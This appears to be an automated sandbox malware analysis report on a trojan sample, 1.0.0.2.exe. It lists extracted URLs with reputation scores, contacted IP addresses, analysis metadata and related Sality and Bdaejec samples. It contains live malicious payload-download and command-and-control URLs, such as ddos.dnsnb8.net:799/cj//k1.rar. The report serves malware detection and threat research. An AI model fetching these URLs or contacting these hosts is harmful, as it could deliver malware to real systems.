          http://ddos.dnsnb8.net:799/cj//k1.rarsrksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2243579607.0000000000BBD000.00000004.00000020.00020000.00000000.sdmpfalse
          • 11%, Virustotal, Browse
          • Avira URL Cloud: phishing
          unknown
          http://g2.arrowhitech.com/xs.jpg?6bfcc6=283082481.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060Nh1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.klkjwre9fqwieluoi.info/1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpfalse
          • 11%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          http://g2.arrowhitech.com/xs.jpg?f4ae4e=1603540601.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060704hM1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430M1.0.0.2.exe, 00000000.00000003.2255294960.000000000761C000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://arthur.niria.biz/xs.jpg1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpfalse
          • 11%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          http://arthur.niria.biz/xs.jpg?51fbda=4835601011.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://amsamex.com/xs.jpg?ce2fff=945889211.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://accnet.ca/xs.jpg1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmpfalse
          • 9%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          http://ahmediye.net/xs.jpg1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpfalse
          • 11%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060xoP1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.baanboard.comBrendonSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          unknown
          http://althawry.org/images/xs.jpg?4f8fad=260706251.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://althawry.org/images/xs.jpg?4f8fad=26070625d1.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://kukutrustnet777888.info/DisableTaskMgrSoftware1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpfalse
          • 14%, Virustotal, Browse
          • Avira URL Cloud: phishing
          unknown
          https://www.smartsharesystems.com/SciTE.exe.2.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.scintilla.orgSciTE.exe.2.drfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://althawry.org/images/xs.jpghttp://www.careerdesk.org/images/xs.jpghttp://arthur.niria.biz/xs.j1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmptrue
          • 7%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://althawry.org/images/xs.jpg1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpfalse
          • 9%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430x1.0.0.2.exe, 00000000.00000003.2255294960.000000000761C000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://accnet.ca/xs.jpghttp://a3inforservice.com.br/images/logof.gif1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://ahmediye.net/xs.jpg?5827cf=5777359V1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://apple-pie.in/images/xs.jpg1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          unknown
          http://arthur.niria.biz/xs.jpg?51fbda=48356010a1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://amsamex.com/xs.jpg?ce2fff=9458892161.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060-1.0.0.2.exe, 00000000.00000003.2255038602.000000000760A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000760A000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.develop.comSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          unknown
          http://althawry.org/images/xs.jpg?4f8fad=2607062541.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.youku.com/playlist_show/id_25824322.html1.0.0.2.exe, 00000000.00000002.2264312389.0000000000C69000.00000040.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.spaceblue.comSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          unknown
          http://www.baanboard.comSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          unknown
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430j1.0.0.2.exe, 00000000.00000003.2255294960.000000000761C000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.develop.comDeepakSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          unknown
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430ellNoRoam1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://127.0.0.1/R2_2021/ServerInfo.json1.0.0.2.exe, 00000000.00000002.2264312389.0000000000401000.00000040.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://arthur.niria.biz/xs.jpg?c12b4b=126595310T1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://kukutrustnet987.info/home.gif1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://ddos.dnsnb8.net:799/cj//k1.rar9rksowY.exe, 00000002.00000002.2243579607.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://ampyazilim.com.tr/images/xs2.jpg1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://www.rftp.comJosiahSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          unknown
          http://ddos.dnsnb8.net:799/cj//k1.rar6rksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://www.activestate.comSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          unknown
          http://ddos.dnsnb8.net:799/cj//k1.rar4rksowY.exe, 00000002.00000002.2243579607.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://173.193.19.14/logo.gif1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DErksowY.exe, 00000002.00000003.2147302621.00000000007F0000.00000004.00001000.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://kukutrustnet888.info/home.gif1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://althawry.org/images/xs.jpg?a6d450=655999681.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://upx.sf.netAmcache.hve.2.drfalse
          • URL Reputation: safe
          unknown
          http://www.rftp.comSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          unknown
          http://arthur.niria.biz/xs.jpg?c12b4b=126595310C1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://ddos.dnsnb8.net:799/cj//k1.rarLrksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://g2.arrowhitech.com/xs.jpg?f4ae4e=1603540608oI1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://kukutrustnet777.info/home.gif1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://www.spaceblue.comMathiasSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          unknown
          https://www.smartsharesystems.com/MortenSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          unknown
          http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gif1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://amsamex.com/xs.jpg?549590=277165601.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430ed;01.0.0.2.exe, 00000000.00000003.2255038602.0000000007591000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.00000000075F3000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.lua.orgSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          unknown
          http://ddos.dnsnb8.net/rksowY.exe, 00000002.00000003.2179982958.0000000000B6D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://g2.arrowhitech.com/xs.jpg1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://ddos.dnsnb8.net:799/cj//k1.rarprksowY.exe, 00000002.00000002.2255119471.00000000028CA000.00000004.00000010.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://ampyazilim.com.tr/images/xs2.jpg?1.1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://kukutrustnet777888.info/1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          unknown
          http://pan.baidu.com/s/1qWKD5ve1.0.0.2.exe, 00000000.00000002.2264312389.0000000000C69000.00000040.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://89.119.67.154/testo5/1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://g2.arrowhitech.com/xs.jpg?6bfcc6=28308248jh71.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430ed1.0.0.2.exe, 00000000.00000002.2273488135.00000000075F3000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430edK21.0.0.2.exe, 00000000.00000003.2255038602.0000000007591000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.00000000075F3000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060&o1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
44.221.84.105 | ddos.dnsnb8.net | United States | US | 14618 | AMAZON-AES | true
78.46.2.155 | ahmediye.net | Germany | DE | 24940 | HETZNER-AS | true
54.244.188.177 | www.careerdesk.org | United States | US | 16509 | AMAZON-02 | true
37.230.104.89 | ampyazilim.com.tr | Turkey | TR | 42807 | AEROTEK-AS | true
85.17.167.196 | unknown | Netherlands | NL | 60781 | LEASEWEB-NL-AMS-01 Netherlands | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1467981
Start date and time: 2024-07-05 07:59:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 30s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 3
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 1.0.0.2.exe
Detection: MAL
Classification: mal100.spre.troj.evad.winEXE@5/15@10/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 69%
• Number of executed functions: 57
• Number of non-executed functions: 15
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): dllhost.exe, audiodg.exe, WerFault.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 40.126.31.69, 40.126.31.67, 40.126.31.71, 20.190.159.71, 20.190.159.64, 20.190.159.73, 20.190.159.2, 20.190.159.68
• Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
02:00:00 | API Interceptor | 181x Sleep call for process: 1.0.0.2.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
44.221.84.105 | FXja4SyAYs.exe | malicious | Unknown | suddencover.net/index.php
44.221.84.105 | FXja4SyAYs.exe | malicious | Unknown | suddencover.net/index.php
44.221.84.105 | 7sAylAXBOb.exe | malicious | Unknown | englishproud.net/index.php
44.221.84.105 | 7sAylAXBOb.exe | malicious | Unknown | englishproud.net/index.php
44.221.84.105 | 5a5O0c0oJP.exe | malicious | Unknown | englishproud.net/index.php
44.221.84.105 | 5a5O0c0oJP.exe | malicious | Unknown | englishproud.net/index.php
44.221.84.105 | log1.exe | malicious | Babadeda, Bdaejec, Neshta | ddos.dnsnb8.net:799/cj//k2.rar
44.221.84.105 | log2.exe | malicious | Babadeda, Bdaejec, Neshta | ddos.dnsnb8.net:799/cj//k2.rar
44.221.84.105 | 2.exe | malicious | Bdaejec | ddos.dnsnb8.net:799/cj//k2.rar
44.221.84.105 | qUIeH5lkl3.exe | malicious | MetaMorpher RAT | bejnz.com/IP.php
78.46.2.155 | pXlV6TKi3E.exe | malicious | Sality | ahmediye.net/xs.jpg?6273be3=929110779
78.46.2.155 | Server.exe | malicious | Mimikatz, Sality | ahmediye.net/xs.jpg?228483d4=579109844
78.46.2.155 | 9zalmn1701.exe | malicious | Sality | ahmediye.net/xs.jpg?14ffade3=-1828863691
54.244.188.177 | FXja4SyAYs.exe | malicious | Unknown | cigaretteshoulder.net/index.php
54.244.188.177 | FXja4SyAYs.exe | malicious | Unknown | cigaretteshoulder.net/index.php
54.244.188.177 | ILTgEaPqmE.exe | malicious | Unknown | cigarettewritten.net/index.php
54.244.188.177 | ILTgEaPqmE.exe | malicious | Unknown | cigarettewritten.net/index.php
54.244.188.177 | Jla3M8Fe16.exe | malicious | Unknown | cigarettewritten.net/index.php
54.244.188.177 | Bn0VHqJWSS.exe | malicious | Unknown | stillneedle.net/index.php
54.244.188.177 | gZVfHNoTGQ.exe | malicious | Unknown | stillneedle.net/index.php
54.244.188.177 | Bn0VHqJWSS.exe | malicious | Unknown | stillneedle.net/index.php
54.244.188.177 | gZVfHNoTGQ.exe | malicious | Unknown | stillneedle.net/index.php
54.244.188.177 | 80b.exe | malicious | Unknown | pywolwnvd.biz/soptlhodr
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ampyazilim.com.tr | pXlV6TKi3E.exe | malicious | Sality | 37.230.104.89
ampyazilim.com.tr | Server.exe | malicious | Mimikatz, Sality | 37.230.104.89
ampyazilim.com.tr | 9zalmn1701.exe | malicious | Sality | 37.230.104.89
apple-pie.in | pXlV6TKi3E.exe | malicious | Sality | 63.251.106.25
apple-pie.in | Server.exe | malicious | Mimikatz, Sality | 63.251.106.25
apple-pie.in | 9zalmn1701.exe | malicious | Sality | 63.251.106.25
ahmediye.net | pXlV6TKi3E.exe | malicious | Sality | 78.46.2.155
ahmediye.net | Server.exe | malicious | Mimikatz, Sality | 78.46.2.155
ahmediye.net | 9zalmn1701.exe | malicious | Sality | 78.46.2.155
www.careerdesk.org | pXlV6TKi3E.exe | malicious | Sality | 206.191.152.58
www.careerdesk.org | Server.exe | malicious | Mimikatz, Sality | 206.191.152.58
www.careerdesk.org | HP8odfgSjP.exe | malicious | Sality | 206.191.152.58
www.careerdesk.org | 9zalmn1701.exe | malicious | Sality | 206.191.152.58
www.careerdesk.org | #U622a#U56fe.exe | malicious | Sality | 206.191.152.58
arthur.niria.biz | pXlV6TKi3E.exe | malicious | Sality | 63.251.106.25
arthur.niria.biz | Server.exe | malicious | Mimikatz, Sality | 63.251.106.25
arthur.niria.biz | HP8odfgSjP.exe | malicious | Sality | 63.251.106.25
arthur.niria.biz | 9zalmn1701.exe | malicious | Sality | 63.251.106.25
arthur.niria.biz | #U622a#U56fe.exe | malicious | Sality | 63.251.106.25
ddos.dnsnb8.net | log1.exe | malicious | Babadeda, Bdaejec, Neshta | 44.221.84.105
ddos.dnsnb8.net | log2.exe | malicious | Babadeda, Bdaejec, Neshta | 44.221.84.105
ddos.dnsnb8.net | 2.exe | malicious | Bdaejec | 44.221.84.105
ddos.dnsnb8.net | gracNYJFpD.exe | malicious | Bdaejec, GhostRat, Nitol, Young Lotus | 44.221.84.105
ddos.dnsnb8.net | xpKZwKFN9W.exe | malicious | Bdaejec | 44.221.84.105
ddos.dnsnb8.net | LVF7FM9Z4I.exe | malicious | Bdaejec | 44.221.84.105
ddos.dnsnb8.net | hJSrJRHret.exe | malicious | Bdaejec | 44.221.84.105
ddos.dnsnb8.net | KFt0cactum.exe | malicious | Bdaejec | 44.221.84.105
ddos.dnsnb8.net | gvQbT2QOfb.exe | malicious | Bdaejec | 44.221.84.105
ddos.dnsnb8.net | HN3iYIEz7m.exe | malicious | Unknown | 34.174.61.199
Match | Associated Sample Name / URL | Detection | Threat Name | Context
LEASEWEB-NL-AMS-01 Netherlands (NL) | http://cacahs.fdavm.com/ | malicious | Unknown | 178.162.175.77
